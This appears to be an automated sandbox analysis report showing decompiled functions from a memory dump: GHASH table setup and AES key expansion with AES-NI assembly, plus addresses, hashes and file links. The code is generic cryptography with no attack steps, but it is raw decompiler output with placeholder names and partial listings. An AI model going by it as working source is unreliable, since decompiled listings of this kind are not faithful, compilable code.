										__eflags = _t150 - _t250;
									} while (_t150 < _t250);
								}
								_t185 = (_t185 << 4) + _v0;
								_a24 = 0;
								_a28 = 0;
								_a32 = 0;
								_a36 = 0;
								E00C6B7A0(_t185, _t250, _t251,  &_a24, _t185, _t250);
								 *((char*)(_t257 + _t250 + 0x34)) = 0x80;
								 *(_t251 + 0x98) =  *(_t251 + 0x98) ^ _a24;
								 *(_t251 + 0xa0) =  *(_t251 + 0xa0) ^ _a32;
								 *(_t251 + 0x9c) =  *(_t251 + 0x9c) ^ _a28;
								_t144 = _a4;
								_t255 = _t257 + 0xc;
								_t132 = _t251 + 0xa4;
								 *_t132 =  *(_t251 + 0xa4) ^ _a36;
								__eflags =  *_t132;
							}
							 *(_t251 + 0x50) = _t144;
							 *(_t251 + 0x54) = _a8;
							__eflags = _a72 ^ _t255;
							return E00C69C26(1, _t185, _a72 ^ _t255, _a8, _t250, _t251);
						} else {
							L8:
							return E00C69C26(0, _t185, _a72 ^ _t258, _t231, _t249, _t251);
						}
					}
				}
				L28:
			}































                                                              0x00b9dec5
                                                              0x00b9deca
                                                              0x00b9ded1
                                                              0x00b9dedf
                                                              0x00b9dee3
                                                              0x00b9dee8
                                                              0x00b9deec
                                                              0x00b9def1
                                                              0x00b9def4
                                                              0x00b9def9
                                                              0x00b9df00
                                                              0x00b9df02
                                                              0x00b9df04
                                                              0x00b9df08
                                                              0x00b9df0c
                                                              0x00b9df12
                                                              0x00b9df8b
                                                              0x00b9df8b
                                                              0x00b9df8e
                                                              0x00b9df91
                                                              0x00b9df95
                                                              0x00000000
                                                              0x00b9df9b
                                                              0x00b9df9b
                                                              0x00b9dfa5
                                                              0x00b9dfaa
                                                              0x00b9dfac
                                                              0x00b9dfae
                                                              0x00b9dfb0
                                                              0x00b9dfb2
                                                              0x00b9dfba
                                                              0x00b9dfc0
                                                              0x00b9dfc0
                                                              0x00b9dfc4
                                                              0x00b9dfcd
                                                              0x00b9dfcf
                                                              0x00b9dfd1
                                                              0x00b9dfd1
                                                              0x00b9dfc0
                                                              0x00b9dfd9
                                                              0x00b9dfda
                                                              0x00b9dfdb
                                                              0x00b9dfe0
                                                              0x00b9dfe3
                                                              0x00b9dfe5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9df9d
                                                              0x00b9df9d
                                                              0x00b9df9f
                                                              0x00000000
                                                              0x00b9dfa5
                                                              0x00000000
                                                              0x00b9dfa5
                                                              0x00b9dfa5
                                                              0x00000000
                                                              0x00b9dfeb
                                                              0x00b9dfed
                                                              0x00b9dff6
                                                              0x00b9dfff
                                                              0x00b9e008
                                                              0x00b9e023
                                                              0x00b9e02c
                                                              0x00b9e030
                                                              0x00b9e04d
                                                              0x00b9e055
                                                              0x00b9e05f
                                                              0x00b9e07a
                                                              0x00b9e081
                                                              0x00b9e085
                                                              0x00b9e087
                                                              0x00b9e09e
                                                              0x00b9e0a3
                                                              0x00b9e0a6
                                                              0x00b9e0af
                                                              0x00b9e0b8
                                                              0x00b9e0c1
                                                              0x00b9e0c7
                                                              0x00b9e0ca
                                                              0x00b9e0cd
                                                              0x00b9e0cd
                                                              0x00b9e0d7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9e0d9
                                                              0x00b9e0d9
                                                              0x00b9e0d9
                                                              0x00b9e0e3
                                                              0x00000000
                                                              0x00b9e0e3
                                                              0x00b9df9f
                                                              0x00b9df9b
                                                              0x00b9df14
                                                              0x00b9df14
                                                              0x00b9df18
                                                              0x00000000
                                                              0x00b9df25
                                                              0x00b9df25
                                                              0x00b9df27
                                                              0x00b9df29
                                                              0x00b9df30
                                                              0x00b9df31
                                                              0x00b9df31
                                                              0x00b9df35
                                                              0x00b9df36
                                                              0x00b9df37
                                                              0x00b9df3c
                                                              0x00b9df41
                                                              0x00b9df81
                                                              0x00b9df83
                                                              0x00b9e0e7
                                                              0x00b9e0e7
                                                              0x00b9e0eb
                                                              0x00b9e0ef
                                                              0x00b9e0ef
                                                              0x00b9e0ef
                                                              0x00b9e0f2
                                                              0x00b9e0f4
                                                              0x00b9e0fd
                                                              0x00b9e106
                                                              0x00b9e112
                                                              0x00b9e11b
                                                              0x00b9e130
                                                              0x00b9e132
                                                              0x00b9e135
                                                              0x00b9e137
                                                              0x00b9e139
                                                              0x00b9e144
                                                              0x00b9e150
                                                              0x00b9e150
                                                              0x00b9e152
                                                              0x00b9e155
                                                              0x00b9e159
                                                              0x00b9e15a
                                                              0x00b9e15e
                                                              0x00b9e15e
                                                              0x00b9e152
                                                              0x00b9e167
                                                              0x00b9e16c
                                                              0x00b9e170
                                                              0x00b9e174
                                                              0x00b9e178
                                                              0x00b9e182
                                                              0x00b9e187
                                                              0x00b9e190
                                                              0x00b9e19e
                                                              0x00b9e1a8
                                                              0x00b9e1ae
                                                              0x00b9e1b2
                                                              0x00b9e1b5
                                                              0x00b9e1b5
                                                              0x00b9e1b5
                                                              0x00b9e1b5
                                                              0x00b9e1c4
                                                              0x00b9e1c7
                                                              0x00b9e1cd
                                                              0x00b9e1dc
                                                              0x00b9df46
                                                              0x00b9df46
                                                              0x00b9df57
                                                              0x00b9df57
                                                              0x00b9df41
                                                              0x00b9df18
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ebe2d39274021ad671eef741b2309ad1515d359f7d9660b227653b656759aa2a
                                                              • Instruction ID: 9586c1ca2c61331058c6be66810d8835e897ce6a254dabd28f8a52b3103b23d2
                                                              • Opcode Fuzzy Hash: ebe2d39274021ad671eef741b2309ad1515d359f7d9660b227653b656759aa2a
                                                              • Instruction Fuzzy Hash: F8A1F4716087008FD768CF29C881A6BF7E5FFC8314F45896EE5AA87351DA30E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9B940, Relevance: .2, Instructions: 246COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00B9B940(signed int* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a44, signed int _a48, signed int _a52, signed int _a60, intOrPtr* _a68) {
				signed int _v0;
				intOrPtr* _t178;
				unsigned int _t179;
				signed int _t182;
				signed int _t186;
				signed int _t187;
				signed int _t208;
				signed int _t210;
				unsigned int _t212;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t224;
				signed int _t231;
				unsigned int _t234;
				signed int _t237;
				signed int _t238;
				signed int _t241;
				signed int _t245;
				signed int _t246;
				signed int _t250;
				signed int _t253;
				signed int _t261;
				signed int _t263;
				unsigned int _t267;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t285;
				signed int _t287;
				signed int _t289;
				signed int _t293;
				signed int _t298;
				signed int _t301;
				signed int _t302;

				E00C6BB10(0x40);
				_t178 = _a68;
				 *_t178 = 0;
				 *((intOrPtr*)(_t178 + 4)) = 0;
				 *((intOrPtr*)(_t178 + 8)) = 0;
				 *((intOrPtr*)(_t178 + 0xc)) = 0;
				_t208 =  *__edx;
				_t179 = __edx[3];
				_t293 = __edx[2];
				_t267 = __edx[1];
				 *(_t178 + 0x80) = _t208;
				 *(_t178 + 0x84) = _t267;
				 *(_t178 + 0x88) = _t293;
				_a48 = _t208;
				_t250 = (_t179 << 0x00000020 | _t293) >> 1;
				 *(_t178 + 0x8c) = _t179;
				_t210 = _t208 << 0x0000001f | _t179 >> 0x00000001;
				_t182 = 0 ^ (_t267 << 0x00000020 | _a48) >> 0x1;
				_t231 =  ~(_t293 & 0x00000001) & 0xe1000000 ^ _t267 >> 0x00000001;
				 *(_t178 + 0x40) = _t182;
				 *(_t178 + 0x44) = _t231;
				_a52 = _t231;
				 *(_t178 + 0x48) = _t250;
				 *(_t178 + 0x4c) = _t210;
				_t234 = _t182 << 0x0000001f | _t210 >> 0x00000001;
				_t212 = _a52;
				_t298 = (_t210 << 0x00000020 | _t250) >> 1;
				_t253 = 0 ^ (_t212 << 0x00000020 | _t182) >> 0x1;
				_t273 =  ~(_t250 & 0x00000001) & 0xe1000000 ^ _t212 >> 0x00000001;
				 *(_t178 + 0x20) = _t253;
				 *(_t178 + 0x24) = _t273;
				 *(_t178 + 0x28) = _t298;
				_a4 = _t253;
				_a4 = _a4 << 0x1f;
				_v0 = 0;
				_t301 = _v0 | (_t234 << 0x00000020 | _t298) >> 0x1;
				 *(_t178 + 0x2c) = _t234;
				_t186 = _a4 | _t234 >> 0x00000001;
				_a60 = _t186;
				_t218 =  ~(_t298 & 0x00000001) & 0xe1000000 ^ _t273 >> 0x00000001;
				_t275 =  *(_t178 + 0x24);
				_t237 = 0 ^ (_t273 << 0x00000020 | _t253) >> 0x1;
				 *(_t178 + 0x10) = _t237;
				 *(_t178 + 0x14) = _t218;
				 *(_t178 + 0x18) = _t301;
				_a44 = _t275;
				_t219 =  *(_t178 + 0x28);
				 *(_t178 + 0x1c) = _t186;
				_t187 =  *(_t178 + 0x20);
				 *(_t178 + 0x34) = _t275 ^ _t218;
				_t277 =  *(_t178 + 0x14);
				_a52 = _t277;
				_t238 =  *(_t178 + 0x2c);
				_a4 = _t238;
				_v0 = _t219;
				 *(_t178 + 0x3c) = _t238 ^ _a60;
				_t241 =  *(_t178 + 0x18);
				 *(_t178 + 0x54) = _t277 ^  *(_t178 + 0x44);
				_t279 =  *(_t178 + 0x1c);
				_a20 = _t279;
				_t302 =  *(_t178 + 0x10);
				 *(_t178 + 0x5c) = _t279 ^  *(_t178 + 0x4c);
				 *(_t178 + 0x30) = _t187 ^ _t237;
				 *(_t178 + 0x64) = _a44 ^  *(_t178 + 0x44);
				_a16 = _t241;
				 *(_t178 + 0x68) = _v0 ^  *(_t178 + 0x48);
				_t285 =  *(_t178 + 0x30);
				 *(_t178 + 0x38) = _t219 ^ _t301;
				_t221 =  *(_t178 + 0x40);
				 *(_t178 + 0x58) = _t241 ^  *(_t178 + 0x48);
				_a24 = _t285;
				_t222 =  *(_t178 + 0x38);
				 *(_t178 + 0x50) = _t302 ^ _t221;
				_a32 = _t222;
				 *(_t178 + 0x60) = _t187 ^ _t221;
				_t245 =  *(_t178 + 0x4c);
				 *(_t178 + 0x70) = _t285 ^ _t221;
				_t287 =  *(_t178 + 0x3c);
				 *(_t178 + 0x78) = _t222 ^  *(_t178 + 0x48);
				_t224 =  *(_t178 + 0x80);
				 *(_t178 + 0x6c) = _a4 ^ _t245;
				_t261 =  *(_t178 + 0x34);
				_a8 = _t302 ^ _t224;
				_a36 = _t287;
				_t246 =  *(_t178 + 0x84);
				_a28 = _t261;
				_a12 = _a52 ^ _t246;
				 *(_t178 + 0x74) = _t261 ^  *(_t178 + 0x44);
				_t263 =  *(_t178 + 0x8c);
				 *(_t178 + 0x7c) = _t287 ^ _t245;
				_t289 =  *(_t178 + 0x88);
				 *((intOrPtr*)(_t178 + 0x90)) = _a8;
				 *((intOrPtr*)(_t178 + 0x94)) = _a12;
				_a8 = _a16 ^ _t289;
				_a12 = _a20 ^ _t263;
				 *(_t178 + 0x98) = _a8;
				 *(_t178 + 0x9c) = _a12;
				 *(_t178 + 0xa4) = _a44 ^ _t246;
				 *(_t178 + 0xa0) = _t187 ^ _t224;
				 *(_t178 + 0xac) = _a4 ^ _t263;
				 *(_t178 + 0xa8) = _v0 ^ _t289;
				 *(_t178 + 0xb4) = _a28 ^ _t246;
				 *(_t178 + 0xb0) = _a24 ^ _t224;
				 *(_t178 + 0xbc) = _a36 ^ _t263;
				 *(_t178 + 0xb8) = _a32 ^ _t289;
				 *(_t178 + 0xc0) = _t224 ^  *(_t178 + 0x40);
				 *(_t178 + 0xc4) = _t246 ^  *(_t178 + 0x44);
				 *(_t178 + 0xcc) =  *(_t178 + 0x4c) ^ _t263;
				 *(_t178 + 0xc8) =  *(_t178 + 0x48) ^ _t289;
				 *(_t178 + 0xd4) =  *(_t178 + 0x54) ^ _t246;
				 *(_t178 + 0xd0) =  *(_t178 + 0x50) ^ _t224;
				 *(_t178 + 0xd8) = _t289 ^  *(_t178 + 0x58);
				 *(_t178 + 0xdc) = _t263 ^  *(_t178 + 0x5c);
				 *(_t178 + 0xe4) =  *(_t178 + 0x64) ^ _t246;
				 *(_t178 + 0xe0) =  *(_t178 + 0x60) ^ _t224;
				 *(_t178 + 0xf8) = _t289 ^  *(_t178 + 0x78);
				 *(_t178 + 0xfc) = _t263 ^  *(_t178 + 0x7c);
				 *(_t178 + 0xec) = _t263 ^  *(_t178 + 0x6c);
				 *(_t178 + 0xe8) = _t289 ^  *(_t178 + 0x68);
				 *(_t178 + 0xf0) = _t224 ^  *(_t178 + 0x70);
				 *(_t178 + 0xf4) = _t246 ^  *(_t178 + 0x74);
				return _t178;
			}








































                                                              0x00b9b945
                                                              0x00b9b94a
                                                              0x00b9b951
                                                              0x00b9b953
                                                              0x00b9b956
                                                              0x00b9b959
                                                              0x00b9b95c
                                                              0x00b9b95e
                                                              0x00b9b962
                                                              0x00b9b966
                                                              0x00b9b969
                                                              0x00b9b96f
                                                              0x00b9b975
                                                              0x00b9b981
                                                              0x00b9b988
                                                              0x00b9b998
                                                              0x00b9b9a0
                                                              0x00b9b9ac
                                                              0x00b9b9b0
                                                              0x00b9b9b2
                                                              0x00b9b9b5
                                                              0x00b9b9b8
                                                              0x00b9b9bc
                                                              0x00b9b9bf
                                                              0x00b9b9cf
                                                              0x00b9b9d1
                                                              0x00b9b9db
                                                              0x00b9b9e6
                                                              0x00b9b9ee
                                                              0x00b9b9f0
                                                              0x00b9b9f3
                                                              0x00b9b9f6
                                                              0x00b9ba01
                                                              0x00b9ba05
                                                              0x00b9ba0a
                                                              0x00b9ba19
                                                              0x00b9ba1f
                                                              0x00b9ba26
                                                              0x00b9ba34
                                                              0x00b9ba3a
                                                              0x00b9ba3c
                                                              0x00b9ba3f
                                                              0x00b9ba41
                                                              0x00b9ba44
                                                              0x00b9ba47
                                                              0x00b9ba4a
                                                              0x00b9ba50
                                                              0x00b9ba53
                                                              0x00b9ba56
                                                              0x00b9ba59
                                                              0x00b9ba5c
                                                              0x00b9ba5f
                                                              0x00b9ba67
                                                              0x00b9ba6a
                                                              0x00b9ba72
                                                              0x00b9ba76
                                                              0x00b9ba7e
                                                              0x00b9ba81
                                                              0x00b9ba84
                                                              0x00b9ba87
                                                              0x00b9ba90
                                                              0x00b9ba93
                                                              0x00b9ba9d
                                                              0x00b9baa0
                                                              0x00b9baaa
                                                              0x00b9bab1
                                                              0x00b9bab4
                                                              0x00b9bab9
                                                              0x00b9babc
                                                              0x00b9bac1
                                                              0x00b9bac4
                                                              0x00b9bace
                                                              0x00b9bad1
                                                              0x00b9bad8
                                                              0x00b9badf
                                                              0x00b9bae2
                                                              0x00b9bae7
                                                              0x00b9baea
                                                              0x00b9baed
                                                              0x00b9baf0
                                                              0x00b9baf8
                                                              0x00b9bafb
                                                              0x00b9bafe
                                                              0x00b9bb06
                                                              0x00b9bb0c
                                                              0x00b9bb12
                                                              0x00b9bb1b
                                                              0x00b9bb23
                                                              0x00b9bb26
                                                              0x00b9bb2c
                                                              0x00b9bb2f
                                                              0x00b9bb35
                                                              0x00b9bb3f
                                                              0x00b9bb4b
                                                              0x00b9bb55
                                                              0x00b9bb5d
                                                              0x00b9bb67
                                                              0x00b9bb75
                                                              0x00b9bb7f
                                                              0x00b9bb8d
                                                              0x00b9bb97
                                                              0x00b9bba5
                                                              0x00b9bbaf
                                                              0x00b9bbbd
                                                              0x00b9bbc3
                                                              0x00b9bbd3
                                                              0x00b9bbdc
                                                              0x00b9bbe9
                                                              0x00b9bbf2
                                                              0x00b9bbff
                                                              0x00b9bc05
                                                              0x00b9bc15
                                                              0x00b9bc1e
                                                              0x00b9bc31
                                                              0x00b9bc37
                                                              0x00b9bc4d
                                                              0x00b9bc53
                                                              0x00b9bc5b
                                                              0x00b9bc61
                                                              0x00b9bc67
                                                              0x00b9bc6d
                                                              0x00b9bc78

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aff455658b15347d0a7bdb51ddfb3d96cae611f9a7466f77bf82a1d0a841161e
                                                              • Instruction ID: 614e5ad5a990903edb75d352e57684b2918de6cb4291b5811c77c91aaccbac7f
                                                              • Opcode Fuzzy Hash: aff455658b15347d0a7bdb51ddfb3d96cae611f9a7466f77bf82a1d0a841161e
                                                              • Instruction Fuzzy Hash: E1C1D5B19143188FD344DF5AC184A56BBE1BF8C710F4685FEEA589B322DB70A940CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9B2D7, Relevance: .2, Instructions: 238COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 15%
                                                              			E00B9B2D7(void* __ecx, void* __edx) {
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t63;
				void* _t64;
				void* _t65;
				signed int _t68;

				_t63 = __edx;
				asm("movups xmm0, [eax]");
				asm("xorps xmm4, xmm4");
				_t3 = _t63 + 0x10; // 0x87c70c75
				_t64 = _t3;
				_t68 =  *0x00ECC794 & 0x10000800;
				if(__ecx == 0x100) {
					asm("movups xmm2, [eax+0x10]");
					_t65 = _t64 + 0x10;
					if(_t68 == 0x10000000) {
						asm("movdqa xmm5, [ebx]");
						asm("movdqa xmm4, [ebx+0x20]");
						_t54 = 7;
						asm("movdqu [edx-0x20], xmm0");
						asm("movdqa xmm1, xmm2");
						asm("movdqu [edx-0x10], xmm2");
						while(1) {
							asm("pshufb xmm2, xmm5");
							asm("aesenclast xmm2, xmm4");
							asm("movdqa xmm3, xmm0");
							asm("pslldq xmm0, 0x4");
							asm("pxor xmm3, xmm0");
							asm("pslldq xmm0, 0x4");
							asm("pxor xmm3, xmm0");
							asm("pslldq xmm0, 0x4");
							asm("pxor xmm0, xmm3");
							asm("pslld xmm4, 0x1");
							asm("pxor xmm0, xmm2");
							asm("movdqu [edx], xmm0");
							_t54 = _t54 - 1;
							if(_t54 == 0) {
								break;
							}
							asm("pshufd xmm2, xmm0, 0xff");
							asm("pxor xmm3, xmm3");
							asm("aesenclast xmm2, xmm3");
							asm("movdqa xmm3, xmm1");
							asm("pslldq xmm1, 0x4");
							asm("pxor xmm3, xmm1");
							asm("pslldq xmm1, 0x4");
							asm("pxor xmm3, xmm1");
							asm("pslldq xmm1, 0x4");
							asm("pxor xmm1, xmm3");
							asm("pxor xmm2, xmm1");
							asm("movdqu [edx+0x10], xmm2");
							_t12 = _t65 + 0x20; // 0xc24548b
							_t65 = _t12;
							asm("movdqa xmm1, xmm2");
						}
						 *((intOrPtr*)(_t65 + 0x10)) = 0xd;
					} else {
						asm("movups [edx-0x20], xmm0");
						asm("movups [edx-0x10], xmm2");
						asm("aeskeygenassist xmm1, xmm2, 0x1");
						_t16 = E00B9B6E6(_t14);
						asm("aeskeygenassist xmm1, xmm0, 0x1");
						_t17 = E00B9B700(_t16, _t65);
						asm("aeskeygenassist xmm1, xmm2, 0x2");
						_t18 = E00B9B6E0(_t17, _t65);
						asm("aeskeygenassist xmm1, xmm0, 0x2");
						_t19 = E00B9B700(_t18, _t65);
						asm("aeskeygenassist xmm1, xmm2, 0x4");
						_t20 = E00B9B6E0(_t19, _t65);
						asm("aeskeygenassist xmm1, xmm0, 0x4");
						_t21 = E00B9B700(_t20, _t65);
						asm("aeskeygenassist xmm1, xmm2, 0x8");
						_t22 = E00B9B6E0(_t21, _t65);
						asm("aeskeygenassist xmm1, xmm0, 0x8");
						_t23 = E00B9B700(_t22, _t65);
						asm("aeskeygenassist xmm1, xmm2, 0x10");
						_t24 = E00B9B6E0(_t23, _t65);
						asm("aeskeygenassist xmm1, xmm0, 0x10");
						_t25 = E00B9B700(_t24, _t65);
						asm("aeskeygenassist xmm1, xmm2, 0x20");
						_t26 = E00B9B6E0(_t25, _t65);
						asm("aeskeygenassist xmm1, xmm0, 0x20");
						_t27 = E00B9B700(_t26, _t65);
						asm("aeskeygenassist xmm1, xmm2, 0x40");
						E00B9B6E0(_t27, _t65);
						asm("movups [edx], xmm0");
						 *((intOrPtr*)(_t65 + 0x10)) = 0xd;
					}
					goto L19;
				} else {
					if(__ecx == 0xc0) {
						asm("movq xmm2, [eax+0x10]");
						if(_t68 == 0x10000000) {
							asm("movdqa xmm5, [ebx+0x10]");
							asm("movdqa xmm4, [ebx+0x20]");
							_t57 = 8;
							asm("movdqu [edx-0x10], xmm0");
							do {
								asm("movq [edx], xmm2");
								asm("movdqa xmm1, xmm2");
								asm("pshufb xmm2, xmm5");
								asm("aesenclast xmm2, xmm4");
								asm("pslld xmm4, 0x1");
								_t64 = _t64 + 0x18;
								asm("movdqa xmm3, xmm0");
								asm("pslldq xmm0, 0x4");
								asm("pxor xmm3, xmm0");
								asm("pslldq xmm0, 0x4");
								asm("pxor xmm3, xmm0");
								asm("pslldq xmm0, 0x4");
								asm("pxor xmm0, xmm3");
								asm("pshufd xmm3, xmm0, 0xff");
								asm("pxor xmm3, xmm1");
								asm("pslldq xmm1, 0x4");
								asm("pxor xmm3, xmm1");
								asm("pxor xmm0, xmm2");
								asm("pxor xmm2, xmm3");
								asm("movdqu [edx-0x10], xmm0");
								_t57 = _t57 - 1;
							} while (_t57 != 0);
							 *((intOrPtr*)(_t64 + 0x20)) = 0xb;
						} else {
							asm("movups [edx-0x10], xmm0");
							asm("aeskeygenassist xmm1, xmm2, 0x1");
							_t30 = E00B9B540(_t14);
							asm("aeskeygenassist xmm1, xmm2, 0x2");
							_t31 = E00B9B580(_t30, _t64);
							asm("aeskeygenassist xmm1, xmm2, 0x4");
							_t32 = E00B9B530(_t31, _t64);
							asm("aeskeygenassist xmm1, xmm2, 0x8");
							_t33 = E00B9B580(_t32, _t64);
							asm("aeskeygenassist xmm1, xmm2, 0x10");
							_t34 = E00B9B530(_t33, _t64);
							asm("aeskeygenassist xmm1, xmm2, 0x20");
							_t35 = E00B9B580(_t34, _t64);
							asm("aeskeygenassist xmm1, xmm2, 0x40");
							_t36 = E00B9B530(_t35, _t64);
							asm("aeskeygenassist xmm1, xmm2, 0x80");
							E00B9B580(_t36, _t64);
							asm("movups [edx], xmm0");
							 *((intOrPtr*)(_t64 + 0x30)) = 0xb;
						}
						goto L19;
					} else {
						if(__ecx != 0x80) {
							asm("pxor xmm0, xmm0");
							return 0xfffffffe;
						} else {
							if(_t68 == 0x10000000) {
								asm("movdqa xmm5, [ebx]");
								_t60 = 8;
								asm("movdqa xmm4, [ebx+0x20]");
								asm("movdqa xmm2, xmm0");
								asm("movdqu [edx-0x10], xmm0");
								do {
									asm("pshufb xmm0, xmm5");
									asm("aesenclast xmm0, xmm4");
									asm("pslld xmm4, 0x1");
									_t64 = _t64 + 0x10;
									asm("movdqa xmm3, xmm2");
									asm("pslldq xmm2, 0x4");
									asm("pxor xmm3, xmm2");
									asm("pslldq xmm2, 0x4");
									asm("pxor xmm3, xmm2");
									asm("pslldq xmm2, 0x4");
									asm("pxor xmm2, xmm3");
									asm("pxor xmm0, xmm2");
									asm("movdqu [edx-0x10], xmm0");
									asm("movdqa xmm2, xmm0");
									_t60 = _t60 - 1;
								} while (_t60 != 0);
								asm("movdqa xmm4, [ebx+0x30]");
								asm("pshufb xmm0, xmm5");
								asm("aesenclast xmm0, xmm4");
								asm("pslld xmm4, 0x1");
								asm("movdqa xmm3, xmm2");
								asm("pslldq xmm2, 0x4");
								asm("pxor xmm3, xmm2");
								asm("pslldq xmm2, 0x4");
								asm("pxor xmm3, xmm2");
								asm("pslldq xmm2, 0x4");
								asm("pxor xmm2, xmm3");
								asm("pxor xmm0, xmm2");
								asm("movdqu [edx], xmm0");
								asm("movdqa xmm2, xmm0");
								asm("pshufb xmm0, xmm5");
								asm("aesenclast xmm0, xmm4");
								asm("movdqa xmm3, xmm2");
								asm("pslldq xmm2, 0x4");
								asm("pxor xmm3, xmm2");
								asm("pslldq xmm2, 0x4");
								asm("pxor xmm3, xmm2");
								asm("pslldq xmm2, 0x4");
								asm("pxor xmm2, xmm3");
								asm("pxor xmm0, xmm2");
								asm("movdqu [edx+0x10], xmm0");
								 *((intOrPtr*)(_t64 + 0x60)) = 9;
							} else {
								asm("movups [edx-0x10], xmm0");
								asm("aeskeygenassist xmm1, xmm0, 0x1");
								_t39 = E00B9B3B6(_t14);
								asm("aeskeygenassist xmm1, xmm0, 0x2");
								_t40 = E00B9B3B0(_t39, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x4");
								_t41 = E00B9B3B0(_t40, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x8");
								_t42 = E00B9B3B0(_t41, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x10");
								_t43 = E00B9B3B0(_t42, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x20");
								_t44 = E00B9B3B0(_t43, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x40");
								_t45 = E00B9B3B0(_t44, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x80");
								_t46 = E00B9B3B0(_t45, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x1b");
								_t47 = E00B9B3B0(_t46, _t64);
								asm("aeskeygenassist xmm1, xmm0, 0x36");
								E00B9B3B0(_t47, _t64);
								asm("movups [edx], xmm0");
								 *((intOrPtr*)(_t64 + 0x50)) = 9;
							}
							L19:
							asm("pxor xmm0, xmm0");
							asm("pxor xmm1, xmm1");
							asm("pxor xmm2, xmm2");
							asm("pxor xmm3, xmm3");
							asm("pxor xmm4, xmm4");
							asm("pxor xmm5, xmm5");
							return 0;
						}
					}
				}
			}







































                                                              0x00b9b2d7
                                                              0x00b9b2e4
                                                              0x00b9b2e7
                                                              0x00b9b2ed
                                                              0x00b9b2ed
                                                              0x00b9b2f0
                                                              0x00b9b2fc
                                                              0x00b9b620
                                                              0x00b9b624
                                                              0x00b9b62d
                                                              0x00b9b720
                                                              0x00b9b724
                                                              0x00b9b729
                                                              0x00b9b72e
                                                              0x00b9b733
                                                              0x00b9b737
                                                              0x00b9b73c
                                                              0x00b9b73c
                                                              0x00b9b741
                                                              0x00b9b746
                                                              0x00b9b74a
                                                              0x00b9b74f
                                                              0x00b9b753
                                                              0x00b9b758
                                                              0x00b9b75c
                                                              0x00b9b761
                                                              0x00b9b765
                                                              0x00b9b76a
                                                              0x00b9b76e
                                                              0x00b9b772
                                                              0x00b9b773
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9b779
                                                              0x00b9b77e
                                                              0x00b9b782
                                                              0x00b9b787
                                                              0x00b9b78b
                                                              0x00b9b790
                                                              0x00b9b794
                                                              0x00b9b799
                                                              0x00b9b79d
                                                              0x00b9b7a2
                                                              0x00b9b7a6
                                                              0x00b9b7aa
                                                              0x00b9b7af
                                                              0x00b9b7af
                                                              0x00b9b7b2
                                                              0x00b9b7b2
                                                              0x00b9b7c0
                                                              0x00b9b633
                                                              0x00b9b638
                                                              0x00b9b63c
                                                              0x00b9b640
                                                              0x00b9b646
                                                              0x00b9b64b
                                                              0x00b9b651
                                                              0x00b9b656
